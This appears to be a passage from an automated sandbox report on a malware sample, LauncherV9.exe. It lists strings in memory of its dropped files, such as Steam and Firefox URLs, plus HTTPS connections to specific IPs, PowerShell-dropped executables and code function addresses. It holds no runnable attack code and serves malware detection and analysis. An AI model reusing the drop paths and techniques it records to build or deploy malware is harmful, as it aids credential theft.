Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: dll.exe, 00000010.00000003.1497879582.000000000442E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: dll.exe, 00000010.00000003.1497879582.000000000442E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: dll.exe, 00000010.00000003.1449202247.0000000004118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: dll.exe, 00000010.00000003.1449202247.0000000004118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: dll.exe, 00000010.00000003.1497879582.000000000442E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: dll.exe, 00000010.00000003.1497879582.000000000442E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: dll.exe, 00000010.00000003.1497879582.000000000442E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: dll.exe, 00000010.00000003.1497879582.000000000442E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: dll.exe, 00000010.00000003.1497879582.000000000442E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: dll.exe, 00000010.00000003.1497879582.000000000442E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397924687.0000000001324000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610800200.000000000127A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571451074.000000000400F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 57848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57849
Source: unknown	Network traffic detected: HTTP traffic on port 57852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57863
Source: unknown	Network traffic detected: HTTP traffic on port 57857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57837
Source: unknown	Network traffic detected: HTTP traffic on port 57864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57854
Source: unknown	Network traffic detected: HTTP traffic on port 57835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57862
Source: unknown	Network traffic detected: HTTP traffic on port 57858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57861
Source: unknown	Network traffic detected: HTTP traffic on port 57856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57839 -> 443

Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:57831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:57832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57833 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:57834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:57836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57835 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:57838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:57841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:57842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:57849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:57854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57855 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:57856 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57857 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:57858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57861 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.5:57862 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.5:57863 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.5:57864 version: TLS 1.2

System Summary

PE file has nameless sections

Source: jaclo.exe.12.dr	Static PE information: section name:
Source: jaclo.exe.12.dr	Static PE information: section name:
Source: jaclo.exe.12.dr	Static PE information: section name:
Source: jaclo.exe.12.dr	Static PE information: section name:
Source: jaclo.exe.12.dr	Static PE information: section name:
Source: dll.exe.15.dr	Static PE information: section name:
Source: dll.exe.15.dr	Static PE information: section name:
Source: dll.exe.15.dr	Static PE information: section name:
Source: dll.exe.15.dr	Static PE information: section name:
Source: dll.exe.15.dr	Static PE information: section name:

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Service.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\zjxbeopkqt\jaclo.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\dll.exe	Jump to dropped file

Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF74631A0C0	0_2_00007FF74631A0C0
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF746302DF0	0_2_00007FF746302DF0
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF746306BE0	0_2_00007FF746306BE0
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF746304920	0_2_00007FF746304920
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF746324918	0_2_00007FF746324918
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF746308AD0	0_2_00007FF746308AD0
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF746329718	0_2_00007FF746329718
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF74631CF50	0_2_00007FF74631CF50
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF746301000	0_2_00007FF746301000
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF7463187D0	0_2_00007FF7463187D0
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF746319088	0_2_00007FF746319088
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF746325028	0_2_00007FF746325028
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF74632589C	0_2_00007FF74632589C
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF7463230C4	0_2_00007FF7463230C4
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF746323558	0_2_00007FF746323558
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF746319594	0_2_00007FF746319594
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF74631EDBC	0_2_00007FF74631EDBC
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF7463185CC	0_2_00007FF7463185CC
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF74631D640	0_2_00007FF74631D640
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF74632B69C	0_2_00007FF74632B69C
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF74632C69C	0_2_00007FF74632C69C
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF74632A334	0_2_00007FF74632A334
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF74631FB40	0_2_00007FF74631FB40
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF746323BD8	0_2_00007FF746323BD8
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF74632DBAC	0_2_00007FF74632DBAC
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF74631C3BC	0_2_00007FF74631C3BC
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF74630D450	0_2_00007FF74630D450
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF74632F170	0_2_00007FF74632F170
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF746330944	0_2_00007FF746330944
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF74632B69C	0_2_00007FF74632B69C
Source: C:\Users\user\Desktop\LauncherV9.exe	Code function: 0_2_00007FF7463189D4	0_2_00007FF7463189D4
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BAFD90	13_2_00BAFD90
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BB2926	13_2_00BB2926
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BABAA0	13_2_00BABAA0
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BCBC90	13_2_00BCBC90
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BD4480	13_2_00BD4480
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BC3CE0	13_2_00BC3CE0
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BE1CD0	13_2_00BE1CD0
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BEB010	13_2_00BEB010
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BDE050	13_2_00BDE050
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BA1040	13_2_00BA1040
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BEA190	13_2_00BEA190
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BCE9E0	13_2_00BCE9E0
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BC6D30	13_2_00BC6D30
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BE3D00	13_2_00BE3D00
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BAB560	13_2_00BAB560
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BAC680	13_2_00BAC680
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BAA2D0	13_2_00BAA2D0
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BACED0	13_2_00BACED0
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BC2A3E	13_2_00BC2A3E
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BD4230	13_2_00BD4230
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BB2E2C	13_2_00BB2E2C
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BA3624	13_2_00BA3624
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BEA220	13_2_00BEA220
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BE1A70	13_2_00BE1A70
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BEB660	13_2_00BEB660
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BE6250	13_2_00BE6250
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BB1E4E	13_2_00BB1E4E
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BB3245	13_2_00BB3245
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BCBF90	13_2_00BCBF90
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BA47F2	13_2_00BA47F2
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BA6FF0	13_2_00BA6FF0
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BA27D0	13_2_00BA27D0
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BA3F10	13_2_00BA3F10
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BA8F70	13_2_00BA8F70
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BCEF70	13_2_00BCEF70
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BCEF50	13_2_00BCEF50
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_00BE2750	13_2_00BE2750
Source: C:\zjxbeopkqt\jaclo.exe	Code function: 13_2_02DC4BD5	13_2_02DC4BD5
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_0038C833	16_2_0038C833
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_00391890	16_2_00391890
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_003810F9	16_2_003810F9
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_0037BA50	16_2_0037BA50
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_00382AF8	16_2_00382AF8
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_003B4300	16_2_003B4300
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_0039CBA0	16_2_0039CBA0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_003983A0	16_2_003983A0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_003BC3A0	16_2_003BC3A0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_0038BCC0	16_2_0038BCC0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_003B7DF0	16_2_003B7DF0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_003BCE10	16_2_003BCE10
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_0039FE40	16_2_0039FE40
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_00385EDA	16_2_00385EDA
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_0037E6D0	16_2_0037E6D0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_00397830	16_2_00397830
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_003B5830	16_2_003B5830
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_00371040	16_2_00371040
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_0039D92B	16_2_0039D92B
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_00394900	16_2_00394900
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_0037B970	16_2_0037B970
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_00396150	16_2_00396150
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_0037D940	16_2_0037D940
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_00372140	16_2_00372140
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_00382185	16_2_00382185
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_003839D0	16_2_003839D0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_0037F9C0	16_2_0037F9C0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_0038E21B	16_2_0038E21B
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_00396A15	16_2_00396A15
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_00399A70	16_2_00399A70
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_003B5250	16_2_003B5250
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_003952B0	16_2_003952B0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_003B5AA0	16_2_003B5AA0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_003A1290	16_2_003A1290
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_00378A80	16_2_00378A80
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_003BCAE0	16_2_003BCAE0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_003992C0	16_2_003992C0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_0037A320	16_2_0037A320
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_0037C320	16_2_0037C320
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_0038C833	16_2_0038C833
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_00372B50	16_2_00372B50
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_00386B81	16_2_00386B81
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_0039F430	16_2_0039F430
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_003AF410	16_2_003AF410
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_0039D460	16_2_0039D460
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_00381C5F	16_2_00381C5F
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_00394C90	16_2_00394C90
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_0039F489	16_2_0039F489
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_00380483	16_2_00380483
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_0037D4D0	16_2_0037D4D0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_0038DCDF	16_2_0038DCDF
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_0037AD20	16_2_0037AD20
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_00383D09	16_2_00383D09
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_00373560	16_2_00373560
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_00395560	16_2_00395560
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_003A155F	16_2_003A155F
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_00379540	16_2_00379540
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_003A05B2	16_2_003A05B2
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_00377DA0	16_2_00377DA0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_00390D90	16_2_00390D90
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_003BB580	16_2_003BB580
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_0038EDDC	16_2_0038EDDC
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_0037CE30	16_2_0037CE30
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_003B8650	16_2_003B8650
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_00380EAB	16_2_00380EAB
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_003A0E93	16_2_003A0E93
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_003B4ED0	16_2_003B4ED0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_0039D730	16_2_0039D730
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_0037C710	16_2_0037C710
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_00373F00	16_2_00373F00
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_0038AF00	16_2_0038AF00
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_0037EFAE	16_2_0037EFAE
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_003B37A0	16_2_003B37A0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_003747E2	16_2_003747E2
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_003BC7D0	16_2_003BC7D0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_00378FC0	16_2_00378FC0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_02E35712	16_2_02E35712
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_02E35733	16_2_02E35733
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 16_2_02E355B3	16_2_02E355B3
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621BF38F0	22_2_00007FF621BF38F0
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621BF20B0	22_2_00007FF621BF20B0
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621BF2820	22_2_00007FF621BF2820
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621C03AD4	22_2_00007FF621C03AD4
